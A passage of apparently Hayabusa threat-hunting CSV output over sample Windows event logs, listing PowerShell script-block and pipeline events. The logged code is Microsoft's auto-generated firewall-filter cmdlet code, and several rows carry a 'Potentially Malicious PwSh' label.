[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.370 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock 
Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.371 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.371 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.372 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.372 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server 
activation and config.evtx +2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) 
